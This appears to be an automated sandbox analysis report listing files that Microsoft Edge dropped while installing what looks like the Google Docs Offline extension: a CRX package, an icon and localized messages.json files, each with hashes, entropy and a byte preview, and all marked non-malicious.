                                                                                                                                                                                                                                                                                                SHA-512:9574A66D3756540479DC955C4057144283E09CAE11CE11EBCE801053BB48E536E67DC823B91895A9E3EE8D3CB27C065D5E9030C39A26CBF3F201348385B418A5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........N.......E#......9e.u.q...VYY..@.+.C..k.O..bK.`..6.G..%.....3Z...e _.6....F..1p..K.Z......./ .3...OT..`..0...Y...FT..43.th.y...}....p.L...2S.&i.`..o...f.oH.....N..:..ijT.3.F{.0.,.f?'f.CQt;b_"Pc.. ..~S.I.c.8Z.;.....{G.a......k...>.`.o..%.$>;.....g.............jg?.R..@.:..........&..{...x@.Py..;kT....%F".S..w...N....9...A..@X.t!i.@..1;......1E..X.....[.~$....J......;=T.;)k..Y...$......S......M.P..P..>..=..u.....2p...w.9..1qw.a\A..Vj .C.....A..Cf1.r6.A...L. _m...[..l.Wr_../.. .B..9!.!+..ZG.K.......0.."0...*.H.............0.........^SUd%Q.L].......Cl2o...\[.....'*...;R=....N.C5....d. .....J.C>u.kr..Y..syJC.XS.q..E.n?....(G.5..)2.G..!.M.SS.{..U....!.EE..M[.#qs.A.1...g)nQ.c..G....Bd..7... .O.BI..KXQ..4.d.K.0......g.....-p....Z.E{...M&.~n.TE7..{0....5.#.C+3.y)pd9.e.........@..3.9..B.....I....2nX........2.?.~..S....]G.N.....Lr.O.Ve....9..D1.G..W)...P.?=.#..7.R.lz..a.wX.e..h.h.~....v..RP.@X....d.G

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\8b2177e8-492e-41f9-87cb-67eddcc22a84.tmp

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:Google Chrome extension, version 3
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):154477
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.835886983924039
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:3072:edP3YiyHk53xr3zWwaFYgn5JFug0HjaHNK7XeSD/r/pLbWNiOAo1np:edPYJHAzyVu7HjacuSD/rBPBOJnp
                                                                                                                                                                                                                                                                                                MD5:14937B985303ECCE4196154A24FC369A
                                                                                                                                                                                                                                                                                                SHA1:ECFE89E11A8D08CE0C8745FF5735D5EDAD683730
                                                                                                                                                                                                                                                                                                SHA-256:71006A5311819FEF45C659428944897184880BCDB571BF68C52B3D6EE97682FF
                                                                                                                                                                                                                                                                                                SHA-512:1D03C75E4D2CD57EEE7B0E93E2DE293B41F280C415FB2446AC234FC5AFD11FE2F2FCC8AB9843DB0847C2CE6BD7DF7213FCF249EA71896FBF6C0696E3F5AEE46C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:Cr24..............0.."0...*.H.............0.........^...1"...w.g..t..2J.G1.)X4..=&.?[j,Lz..j.u.e[I.q*Ba/X...P.h..L.....2%3_o.......H.)'.=.e...?.......j..3UH.|.X.M..u..s[.*..?$....F%....I....)..,-./.e5).f..O.q.^........9..(.._.ph2..^.YBPXf_8....h[.v...S.*1`.#..5.SF.:f-.#.65.i..b.]9...y2.'....k[........%0............G.m.}...CG.....a.s.:.S..QiI.fT.k.MdOF.2....D...v`m...M.7'.R.d...8....2..~.<w8!.W..Sg.._A6.(.pC..w.=..!..7h!J...].....3......Kf..k...|....6./.p.....A....e.1.y.<~Mu..+(v8W........?=.V+.Gb&...u8)...=Qt...... ......x.}.f..&X.SN9e..L....[0Y0...*.H.=....*.H.=....B..............r...2..+Y.I...k..bR.j5Sl..8.......H"i.-l..`.Q.{...G0E.!....~..E...Au.C.q..y.?2An.a..Zn}. H~.vtgI...o.|.j.e....p.........".&...........Z]o.H..+..zF.......S.E}@.F..".P`...3......jW....H.H...:..8.......<...........Z.e.>..vV.......J.,/.X.....?.%.....6....m#.u].Z...[.s.M_...J.."9l..l...,|.....r...QC.....4:....wj.O...5....s.n.%.....y....c.....#F........)gv(..!S

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\128.png

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):4982
                                                                                                                                                                                                                                                                                                Entropy (8bit):7.929761711048726
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:96:L7Rf7U1ylWb3KfyEfOXE+PIcvBirQFiAql1ZwKREkXCSAk:pTvWqfD+gl0sAql1u7kySAk
                                                                                                                                                                                                                                                                                                MD5:913064ADAAA4C4FA2A9D011B66B33183
                                                                                                                                                                                                                                                                                                SHA1:99EA751AC2597A080706C690612AEEEE43161FC1
                                                                                                                                                                                                                                                                                                SHA-256:AFB4CE8882EF7AE80976EBA7D87F6E07FCDDC8E9E84747E8D747D1E996DEA8EB
                                                                                                                                                                                                                                                                                                SHA-512:162BF69B1AD5122C6154C111816E4B87A8222E6994A72743ED5382D571D293E1467A2ED2FC6CC27789B644943CF617A56DA530B6A6142680C5B2497579A632B5
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:.PNG........IHDR..............>a....=IDATx..]}...U..;...O.Q..QH.I(....v..E....GUb*..R[.4@%..hK..B..(.B..". ....&)U#.%...jZ...JC.8.....{.cfvgf.3;.....}ow.....{...P.B...*T.P.B...*Tx...=.Q..wv.w.....|.e.1.$.P.?..l_\.n.}...~.g.....Q...A.f....m.....{,...C2 %..X.......FE.1.N..f...Q..D.K87.....:g..Q.{............3@$.8.....{.....q....G.. .....5..y......)XK..F...D.......... ."8...J#.eM.i....H.E.....a.RIP.`......)..T.....! .[p`X.`..L.a....e. .T..2.....H..p$..02...j....\..........s{...Ymm~.a........f.$./.[.{..C.2:.0..6..]....`....NW.....0..o.T..$;k.2......_...k..{,.+........{..6...L..... .dw...l$..}...K...EV....0......P...e....k....+Go....qw.9.1...X2\..qfw0v.....N...{...l.."....f.A..I..+#.v....'..~E.N-k.........{...l.$..ga..1...$......x$X=}.N..S..B$p..`..`.ZG:c..RA.(.0......Gg.A.I..>...3u.u........_..KO.m.........C...,..c.......0...@_..m...-..7.......4LZ......j@.......\..'....u. QJ.:G..I`.w'B0..w.H..'b.0- ......|..}./.....e..,.K.1........W.u.v. ...\.o

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\af\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):908
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.512512697156616
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgMTCBxNB+kCIww3v+BBJ/wjsV8lCBxeBeRiGTCSU8biHULaBg/4srCBhUJJ:1HAkkJ+kCIwEg/wwbw0PXa22QLWmSDg
                                                                                                                                                                                                                                                                                                MD5:12403EBCCE3AE8287A9E823C0256D205
                                                                                                                                                                                                                                                                                                SHA1:C82D43C501FAE24BFE05DB8B8F95ED1C9AC54037
                                                                                                                                                                                                                                                                                                SHA-256:B40BDE5B612CFFF936370B32FB0C58CC205FC89937729504C6C0B527B60E2CBA
                                                                                                                                                                                                                                                                                                SHA-512:153401ECDB13086D2F65F9B9F20ACB3CEFE5E2AEFF1C31BA021BE35BF08AB0634812C33D1D34DA270E5693A8048FC5E2085E30974F6A703F75EA1622A0CA0FFD
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\am\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1285
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.702209356847184
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
                                                                                                                                                                                                                                                                                                MD5:9721EBCE89EC51EB2BAEB4159E2E4D8C
                                                                                                                                                                                                                                                                                                SHA1:58979859B28513608626B563138097DC19236F1F
                                                                                                                                                                                                                                                                                                SHA-256:3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
                                                                                                                                                                                                                                                                                                SHA-512:FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ar\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1244
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5533961615623735
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
                                                                                                                                                                                                                                                                                                MD5:3EC93EA8F8422FDA079F8E5B3F386A73
                                                                                                                                                                                                                                                                                                SHA1:24640131CCFB21D9BC3373C0661DA02D50350C15
                                                                                                                                                                                                                                                                                                SHA-256:ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
                                                                                                                                                                                                                                                                                                SHA-512:F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\az\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):977
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.867640976960053
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
                                                                                                                                                                                                                                                                                                MD5:9A798FD298008074E59ECC253E2F2933
                                                                                                                                                                                                                                                                                                SHA1:1E93DA985E880F3D3350FC94F5CCC498EFC8C813
                                                                                                                                                                                                                                                                                                SHA-256:628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
                                                                                                                                                                                                                                                                                                SHA-512:9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\be\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):3107
                                                                                                                                                                                                                                                                                                Entropy (8bit):3.535189746470889
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
                                                                                                                                                                                                                                                                                                MD5:68884DFDA320B85F9FC5244C2DD00568
                                                                                                                                                                                                                                                                                                SHA1:FD9C01E03320560CBBB91DC3D1917C96D792A549
                                                                                                                                                                                                                                                                                                SHA-256:DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
                                                                                                                                                                                                                                                                                                SHA-512:7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\bg\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1389
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.561317517930672
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
                                                                                                                                                                                                                                                                                                MD5:2E6423F38E148AC5A5A041B1D5989CC0
                                                                                                                                                                                                                                                                                                SHA1:88966FFE39510C06CD9F710DFAC8545672FFDCEB
                                                                                                                                                                                                                                                                                                SHA-256:AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
                                                                                                                                                                                                                                                                                                SHA-512:891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\bn\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):1763
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.25392954144533
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
                                                                                                                                                                                                                                                                                                MD5:651375C6AF22E2BCD228347A45E3C2C9
                                                                                                                                                                                                                                                                                                SHA1:109AC3A912326171D77869854D7300385F6E628C
                                                                                                                                                                                                                                                                                                SHA-256:1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
                                                                                                                                                                                                                                                                                                SHA-512:958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\ca\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):930
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.569672473374877
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
                                                                                                                                                                                                                                                                                                MD5:D177261FFE5F8AB4B3796D26835F8331
                                                                                                                                                                                                                                                                                                SHA1:4BE708E2FFE0F018AC183003B74353AD646C1657
                                                                                                                                                                                                                                                                                                SHA-256:D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
                                                                                                                                                                                                                                                                                                SHA-512:E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\cs\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):913
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.947221919047
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
                                                                                                                                                                                                                                                                                                MD5:CCB00C63E4814F7C46B06E4A142F2DE9
                                                                                                                                                                                                                                                                                                SHA1:860936B2A500CE09498B07A457E0CCA6B69C5C23
                                                                                                                                                                                                                                                                                                SHA-256:21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
                                                                                                                                                                                                                                                                                                SHA-512:35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\cy\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):806
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.815663786215102
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
                                                                                                                                                                                                                                                                                                MD5:A86407C6F20818972B80B9384ACFBBED
                                                                                                                                                                                                                                                                                                SHA1:D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
                                                                                                                                                                                                                                                                                                SHA-256:A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
                                                                                                                                                                                                                                                                                                SHA-512:D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
                                                                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                                                                Preview:{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

                                                                                                                                                                                                                                                                                                C:\Users\user\AppData\Local\Temp\scoped_dir920_2096276513\CRX_INSTALL\_locales\da\messages.json

                                                                                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                File Type:JSON data
                                                                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                                                                Size (bytes):883
                                                                                                                                                                                                                                                                                                Entropy (8bit):4.5096240460083905
                                                                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                                                                SSDEEP:24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
                                                                                                                                                                                                                                                                                                MD5:B922F7FD0E8CCAC31B411FC26542C5BA
                                                                                                                                                                                                                                                                                                SHA1:2D25E153983E311E44A3A348B7D97AF9AAD21A30
                                                                                                                                                                                                                                                                                                SHA-256:48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
                                                                                                                                                                                                                                                                                                SHA-512:AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
                                                                                                                                                                                                                                                                                                Malicious:false
